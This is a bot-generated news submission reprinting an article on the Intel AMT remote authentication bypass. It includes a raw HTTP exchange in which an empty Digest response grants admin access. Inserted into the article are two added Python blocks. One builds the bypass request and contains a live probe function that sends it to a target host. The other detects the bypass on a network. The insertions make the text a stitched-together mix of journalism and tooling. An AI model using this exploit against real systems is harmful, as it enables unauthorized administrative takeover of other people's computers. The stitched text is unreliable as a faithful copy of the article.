
Submission Preview

The hijacking flaw that lurked in Intel chips is worse than anyone thought

Rejected submission by exec at 2017-05-08 03:21:44
News

Story automatically generated by StoryBot Version 0.2.2 rel Testing.
Storybot ('Arthur T Knackerbracket') has been converted to Python3

Note: This is the complete story and will need further editing. It may also be covered
by Copyright and thus should be acknowledged and quoted rather than printed in its entirety.

FeedSource: [HackerNews]

Time: 2017-05-07 03:48:11 UTC

Original URL: https://arstechnica.com/security/2017/05/the-hijacking-flaw-that-lurked-in-intel-chips-is-worse-than-anyone-thought/ [arstechnica.com] using UTF-8 encoding.

Title: The hijacking flaw that lurked in Intel chips is worse than anyone thought

--- --- --- --- --- --- --- Entire Story Below --- --- --- --- --- --- ---

Arthur T Knackerbracket has found the following story [arstechnica.com]:

A remote hijacking flaw that lurked in Intel chips for seven years was more severe than many people imagined, because it allowed hackers to remotely gain administrative control over huge fleets of computers without entering a password. This is according to technical analyses published Friday.

AMT, which is available with many vPro processors, is set up to require a password before it can be accessed remotely through its Web browser interface. But, remarkably, that check can be bypassed with an empty credential. According to a blog post published Friday [tenable.com] by Tenable Network Security, the response hash that the interface's digest access authentication [wikipedia.org] uses to verify that someone is authorized to log in does not have to be the right value: the server accepted an empty string.

"Authentication still worked" even when the wrong hash was entered, Tenable Director of Reverse Engineering Carlos Perez wrote. "We had discovered a complete bypass of the authentication scheme."

A separate technical analysis from Embedi, the security firm Intel credited with first disclosing the vulnerability, arrived at the same conclusion. It stated:

With a little help of the local proxy at `127.0.0.1:16992`, which is meant to replace the response with an empty string, we're able to manage the AMT via the regular Web browser as if we knew the *admin* password:

```
GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 678
Connection: close

GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c"

HTTP/1.1 200 OK
Date: Thu, 4 May 2017 16:09:17 GMT
Server: AMT
Content-Type: text/html
Transfer-Encoding: chunked
Cache-Control: no cache
Expires: Thu, 26 Oct 1995 00:00:00 GMT

04E6
```

Embedi e-mailed the analysis to reporters, but didn't publish it online.
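The exchange above, worked through in code. This is an added example, not code from Embedi, Tenable, Intel or the article: it parses the 401 challenge quoted above, builds the second request with `response=""` exactly as Embedi did, and then contrasts two models of the server-side check. The `vulnerable_compare` model (a comparison bounded by the length of the client-supplied response, so an empty string or any prefix of the right hash passes) reflects the published root-cause analyses of this flaw (CVE-2017-5689), not anything stated on this page; `fixed_compare` is what a correct RFC 2617 verifier does. The host, port, `admin` password and the `probe` target are assumptions.

```python
# Added example (not Embedi's, Tenable's or Intel's code): replay the Digest
# exchange quoted above against two models of the AMT check, vulnerable and
# fixed.  Host, port, password and the "vulnerable_compare" model are assumptions.
import hashlib
import hmac
import re

# The WWW-Authenticate challenge exactly as it appears in the 401 above.
CHALLENGE = ('Digest realm="Digest:048A0000000000000000000000000000", '
             'nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"')

# key="quoted value" or key=token, comma separated (RFC 2617 syntax)
_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')


def parse_digest_params(header_value):
    """Split a 'Digest k=v, k=v' header (challenge or credentials) into a dict."""
    scheme, _, params = header_value.partition(' ')
    if scheme.lower() != 'digest':
        raise ValueError('not a Digest header: %r' % scheme)
    return {k: quoted or token for k, quoted, token in _PARAM.findall(params)}


def digest_response(user, realm, password, method, uri, nonce, nc, cnonce, qop='auth'):
    """The response a correct server computes and expects (RFC 2617, MD5, qop=auth)."""
    def md5(s):
        return hashlib.md5(s.encode()).hexdigest()
    ha1 = md5('%s:%s:%s' % (user, realm, password))
    ha2 = md5('%s:%s' % (method, uri))
    return md5('%s:%s:%s:%s:%s:%s' % (ha1, nonce, nc, cnonce, qop, ha2))


def build_authorization(user, realm, nonce, uri, response,
                        nc='00000001', cnonce='60513ab58858482c'):
    """Authorization header value in the shape of the second request above."""
    return ('Digest username="%s", realm="%s", nonce="%s", uri="%s", '
            'response="%s", qop=auth, nc=%s, cnonce="%s"'
            % (user, realm, nonce, uri, response, nc, cnonce))


def bypass_request(host, www_authenticate, uri='/index.htm'):
    """Raw request that replays the bypass: username admin, response left empty."""
    ch = parse_digest_params(www_authenticate)
    auth = build_authorization('admin', ch['realm'], ch['nonce'], uri, response='')
    return ('GET %s HTTP/1.1\r\nHost: %s\r\nAuthorization: %s\r\n'
            'Connection: close\r\n\r\n' % (uri, host, auth))


def vulnerable_compare(expected, supplied):
    """Model of the flawed AMT check (from the published analyses, not this page):
    the comparison is bounded by the length of the *client-supplied* response,
    i.e. strncmp(expected, supplied, strlen(supplied)) == 0, so an empty string
    or any prefix of the right hash passes."""
    return expected[:len(supplied)] == supplied


def fixed_compare(expected, supplied):
    """What the check must be: full-length, constant-time equality."""
    return hmac.compare_digest(expected.encode(), supplied.encode())


def server_decision(password, authorization, vulnerable):
    """Accept or reject an Authorization header for a GET, as a server that
    knows `password` would, using either comparison."""
    p = parse_digest_params(authorization)
    expected = digest_response(p['username'], p['realm'], password, 'GET',
                               p['uri'], p['nonce'], p['nc'], p['cnonce'], p['qop'])
    check = vulnerable_compare if vulnerable else fixed_compare
    return check(expected, p['response'])


def probe(host, port=16992, uri='/index.htm', timeout=5):
    """Live check against a real target (needs network; assumed host/port):
    True if the empty-response replay is answered with 200 instead of 401."""
    import http.client
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request('GET', uri)
    resp = conn.getresponse()
    resp.read()
    www = resp.getheader('WWW-Authenticate', '')
    if resp.status != 401 or not www.lower().startswith('digest'):
        conn.close()
        return False  # not an AMT digest endpoint
    ch = parse_digest_params(www)
    conn.request('GET', uri, headers={'Authorization': build_authorization(
        'admin', ch['realm'], ch['nonce'], uri, response='')})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status == 200


if __name__ == '__main__':
    print(bypass_request('127.0.0.1:16992', CHALLENGE))
```

`server_decision` is the part worth studying: with the vulnerable comparison an empty response is accepted for any password, and so is a prefix of the correct hash, while the constant-time full-length comparison rejects both. `probe` is the same request sent for real; run it only against systems you are authorized to test.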

Making matters worse, unauthorized accesses typically aren't logged by the PC, because AMT has direct access to the computer's network hardware. When AMT is enabled, the network controller diverts packets addressed to AMT's ports to the Intel Management Engine, and from there to AMT; they bypass the OS entirely, so host-based logging and host firewalls never see them. The vulnerable management features were made available in some, but not all, Intel chipsets starting in 2010, Embedi has said.
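Because the host never sees this traffic, detection has to happen on the network: a tap or span port in front of the management VLAN, or the firewall that fronts it. The following is an added example, not from the article or any of the vendors involved, of the check such a sensor would run over reconstructed HTTP requests. It flags AMT-port traffic from outside the management subnet and, separately, any Digest `Authorization` header whose `response` is missing, empty, or shorter than a 32-hex-digit MD5, which is the exact shape of the bypass request above. The sample records are constructed; the port list and the management subnet are assumptions.

```python
# Added example (not from the article, Embedi, Tenable or Intel): network-side
# detection of the AMT bypass, since the host OS cannot log it.  Sample records
# are constructed; AMT_PORTS and MGMT_NETS are assumptions for the example.
import ipaddress
import re

# Assumption: the ports AMT firmware listens on (HTTP, HTTPS, redirection, ASF/RMCP).
AMT_PORTS = {16992, 16993, 16994, 16995, 623, 664}
# Assumption: the only subnet from which management consoles should reach AMT.
MGMT_NETS = [ipaddress.ip_network('10.0.100.0/24')]

_AUTHZ = re.compile(r'^Authorization:\s*Digest\b(.*)$', re.I | re.M)
_RESPONSE = re.compile(r'\bresponse="([^"]*)"')
_MD5_HEX = re.compile(r'[0-9a-fA-F]{32}')


def inspect(record):
    """record: {'src', 'dst', 'dport', 'request'}.  Returns a list of reasons;
    an empty list means nothing suspicious about this request."""
    reasons = []
    if record['dport'] not in AMT_PORTS:
        return reasons
    if not any(ipaddress.ip_address(record['src']) in net for net in MGMT_NETS):
        reasons.append('AMT port %d reached from non-management host %s'
                       % (record['dport'], record['src']))
    m = _AUTHZ.search(record['request'])
    if m:
        r = _RESPONSE.search(m.group(1))
        if r is None:
            reasons.append('Digest credentials without a response= field')
        elif not _MD5_HEX.fullmatch(r.group(1)):
            # Empty or truncated response: the shape of the bypass request above.
            reasons.append('Digest response is not a 32-hex-digit MD5: %r' % r.group(1))
    return reasons


def scan(records):
    """Return [(index, reasons)] for every record that raised at least one reason."""
    out = []
    for i, rec in enumerate(records):
        reasons = inspect(rec)
        if reasons:
            out.append((i, reasons))
    return out


# Constructed sample traffic (not captured data).
SAMPLES = [
    {  # legitimate console, full-length hash: no alert
        'src': '10.0.100.7', 'dst': '10.0.5.20', 'dport': 16992,
        'request': ('GET /index.htm HTTP/1.1\r\nHost: 10.0.5.20:16992\r\n'
                    'Authorization: Digest username="admin", realm="Digest:048A00", '
                    'nonce="abc", uri="/index.htm", '
                    'response="0123456789abcdef0123456789abcdef", '
                    'qop=auth, nc=00000001, cnonce="60513ab58858482c"\r\n\r\n')},
    {  # outside host replaying the bypass: two alerts
        'src': '198.51.100.9', 'dst': '10.0.5.20', 'dport': 16992,
        'request': ('GET /index.htm HTTP/1.1\r\nHost: 10.0.5.20:16992\r\n'
                    'Authorization: Digest username="admin", realm="Digest:048A00", '
                    'nonce="abc", uri="/index.htm", response="", '
                    'qop=auth, nc=00000001, cnonce="60513ab58858482c"\r\n\r\n')},
    {  # ordinary web traffic on another port: ignored
        'src': '198.51.100.9', 'dst': '10.0.5.20', 'dport': 443,
        'request': 'GET / HTTP/1.1\r\nHost: 10.0.5.20\r\n\r\n'},
    {  # inside host, but a truncated hash: prefix-match abuse
        'src': '10.0.100.7', 'dst': '10.0.5.21', 'dport': 16993,
        'request': ('GET /logon.htm HTTP/1.1\r\nHost: 10.0.5.21:16993\r\n'
                    'Authorization: Digest username="admin", realm="Digest:048A00", '
                    'nonce="abc", uri="/logon.htm", response="0123", '
                    'qop=auth, nc=00000001, cnonce="60513ab58858482c"\r\n\r\n')},
]

if __name__ == '__main__':
    for i, reasons in scan(SAMPLES):
        print(i, reasons)
```

Note that the HTTPS port (16993) carries the same header inside TLS, so the second check only works there if the sensor terminates or inspects TLS; the source-subnet check still applies. A host-based agent on the managed PC cannot substitute for this, for the reason the paragraph above gives.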

In a blog post published Friday [intel.com], Intel officials said they expect PC makers to release patches next week. The releases update the Intel firmware, so patching means reflashing the management firmware on each vulnerable system. In the meantime, Intel is urging customers to download and run this discovery tool [intel.com] to identify potentially vulnerable computers. Systems that test positive should be temporarily secured using this mitigation guide [intel.com] until a patch is available. Computer makers Fujitsu [fujitsu.com], HP [hp.com], and Lenovo [lenovo.com] have also issued advisories for specific models they sell.

[Update, 5:40pm EDT] A query of the Shodan security search engine [shodan.io] found over 8,500 systems with the AMT interface exposed to the Internet, with over 2,000 in the United States alone:

(Image: one of the hits for the AMT interface on Shodan. Credit: Shodan [shodan.io])

Many others may be accessible via organizational networks.

-- submitted from IRC

